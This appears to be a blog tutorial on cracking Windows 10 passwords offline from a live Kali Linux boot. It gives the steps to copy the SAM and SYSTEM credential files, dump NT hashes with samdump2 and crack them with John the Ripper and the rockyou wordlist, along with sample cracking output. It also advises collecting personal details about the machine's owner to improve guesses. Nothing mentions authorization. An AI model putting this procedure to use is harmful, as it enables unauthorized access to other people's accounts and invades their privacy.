Cracking Windows 10 passwords with john the ripper on Kali Linux 2016.

Cracking the SAM file in Windows 10 is easy with Kali Linux. Use a Live Kali Linux DVD and mount the Windows 10 partition.

Firstly, get the SAM and SYSTEM files from the C:\Windows\System32\config folder. Copy these to your desktop directory.

Then dump the password hashes.

[email protected]:~/Desktop# samdump2 SYSTEM SAM -o out

Now grab the rockyou.txt wordlist.

[email protected]:~/Desktop# zcat /usr/share/wordlists/rockyou.txt.gz > rock.txt

Now I am attempting to crack the Windows user password.

[email protected]:~/Desktop# john out -format=nt -wordlist rock.txt

If this is successful, this output should be printed, or something like this…

root@kali:~/Desktop# john out -format=nt -wordlist rock.txt 
Warning: invalid UTF-8 seen reading rock.txt
Using default input encoding: UTF-8
Loaded 54 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
password         ()
                 (*disabled* Administrator)
2g 0:00:00:00 DONE (2016-03-24 12:30) 200.0g/s 354600p/s 354600c/s 18442KC/s dirk..sss
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now cat the john.pot file, this should contain cracked passwords.

root@kali:~/Desktop# cat ~/.john/john.pot 

If the password is in the wordlist, it should be cracked. This is easy, but the wordlist needs to be very large indeed to increase the possibility of cracking the password. Get as much information about the computer owner as possible. They might have used the name of their pet or loved one.

There is a directory here, this contains a few very large wordlists.

More here:

No comments have been made. Use this form to start the conversation :)

Leave a Reply